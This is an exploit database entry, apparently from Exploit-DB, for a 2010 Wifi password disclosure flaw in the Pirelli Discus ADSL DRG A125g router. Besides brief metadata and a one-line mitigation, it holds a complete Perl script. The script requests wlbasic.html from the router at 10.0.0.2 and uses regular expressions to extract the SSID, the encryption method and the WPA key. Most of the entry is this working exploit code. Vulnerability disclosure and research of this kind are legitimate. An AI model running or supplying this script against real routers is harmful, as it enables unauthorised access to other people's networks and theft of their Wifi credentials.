Pirelli Discus ADSL DRG A125g Wifi password disclosure

vendor:

Discus ADSL DRG A125g

by:

Sebastián Magof

7,8

CVSS

HIGH

Local

N/A

CWE

Product Name: Discus ADSL DRG A125g

Affected Version From: N/A

Affected Version To: N/A

Patch Exists: NO

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2010

Pirelli Discus ADSL DRG A125g Wifi password disclosure

This exploit discloses the Wifi password of Pirelli Discus ADSL DRG A125g router. It uses LWP::UserAgent and HTTP::Request to send a GET request to the vulnerable file wlbasic.html. The content of the response is parsed to extract the SSID, encryption method and the password.

Mitigation:

Disable the Wifi feature of the router or change the password.

Source

Exploit-DB raw data:

#!/usr/bin/perl 

#Author: Sebastián Magof

#Hardware: pirelli discus DRG A125g

#Vulnerable file: wlbasic.html

#Bug: Wifi Password Disclosure

#Type: Local

# (\/)

# (**) ±lpha

#(")(")

#usage:perl exploit.pl

use LWP::UserAgent;

use HTTP::Request;

#begin

print "\n\n************************************************************\n";

print "*  Pirelli Discus ADSL DRG A125g Wifi password disclosure  *\n";

print "************************************************************\n\n";



#wifi pwd disclosure file

my $url = "http://10.0.0.2/wlbasic.html";



#UserAgent

my $ua = LWP::UserAgent->new();

$ua->agent("Mozilla/5.0");



#Request.

my $req = HTTP::Request->new(GET => $url);

my $request = $ua->request($req);

my $content = $request->content(); #content

my ($ssi) = $content =~ m/ssid = '(.+)'/;

my ($pwd) = $content =~ m/wpaPskKey = '(.+)'/;

my ($enc) = $content =~ m/var wpa = '(.+)'/;

#ssid+encryption method+pwd;

print "Ssid: $ssi\n";

print "Encryption method: $enc\n";

print "Password: $pwd\n\n";

exit(0);



__EOF__